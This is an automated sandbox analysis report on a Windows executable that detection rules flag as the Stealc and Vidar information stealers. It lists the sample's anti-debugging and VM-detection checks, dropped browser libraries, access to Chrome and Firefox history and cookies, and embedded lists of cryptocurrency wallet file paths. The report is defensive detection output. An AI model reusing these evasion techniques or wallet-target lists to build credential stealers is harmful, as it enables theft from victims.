Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E55732 second address: E55736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E55A56 second address: E55A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CE4DC41ACh 0x00000008 jmp 00007F8CE4DC41B2h 0x0000000d je 00007F8CE4DC41A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E55CED second address: E55CF7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E59163 second address: E5916F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8CE4DC41A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5916F second address: E59173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5BCCA second address: E5BD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8CE4DC41AFh 0x0000000f jl 00007F8CE4DC41A6h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F8CE4DC41B7h 0x0000001d nop 0x0000001e mov dword ptr [ebp+122D2E41h], edx 0x00000024 push 00000004h 0x00000026 add dx, 3330h 0x0000002b call 00007F8CE4DC41A9h 0x00000030 push esi 0x00000031 push ecx 0x00000032 jnl 00007F8CE4DC41A6h 0x00000038 pop ecx 0x00000039 pop esi 0x0000003a push eax 0x0000003b jo 00007F8CE4DC41C4h 0x00000041 pushad 0x00000042 jnp 00007F8CE4DC41A6h 0x00000048 jmp 00007F8CE4DC41B6h 0x0000004d popad 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5BD5D second address: E5BD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8CE470D046h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA027E second address: 4CA0283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0328 second address: 4CA033D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA033D second address: 4CA0389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop esi 0x0000000f pushfd 0x00000010 jmp 00007F8CE4DC41AFh 0x00000015 sub esi, 22593E0Eh 0x0000001b jmp 00007F8CE4DC41B9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0389 second address: 4CA03AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8CE470D04Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA03AF second address: 4CA03B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA03B5 second address: 4CA03B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA03B9 second address: 4CA03D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8CE4DC41B1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA03D7 second address: 4CA03EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C7A8 second address: D7C7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8CE4DC41A6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C7BD second address: D7C7D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D056h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BD1C48 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BCF166 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BD1B98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DFB94D instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 10.0 %

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00984910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00984910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0097DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0097E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0097F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00983EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00983EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009716D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0097BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009838B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0097ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00984570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00984570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0097DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00971160 GetSystemInfo,ExitProcess,

0_2_00971160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware!
Source: file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58147
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58150
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59336
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58165
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58161
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58200

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C625FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C625FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009745C0 VirtualProtect ?,00000004,00000100,00000000

0_2_009745C0

Source: C:\Users\user\Desktop\file.exe

0_2_00989860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00989750 mov eax, dword ptr fs:[00000030h]

0_2_00989750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009878E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_009878E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C5FB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C5FB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00989600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00989600

Source: file.exe, file.exe, 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: _kProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5FB341 cpuid

0_2_6C5FB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00987B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00987980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00987980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00987850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00987850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00987A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00987A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734725607.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonnb
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.Va

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
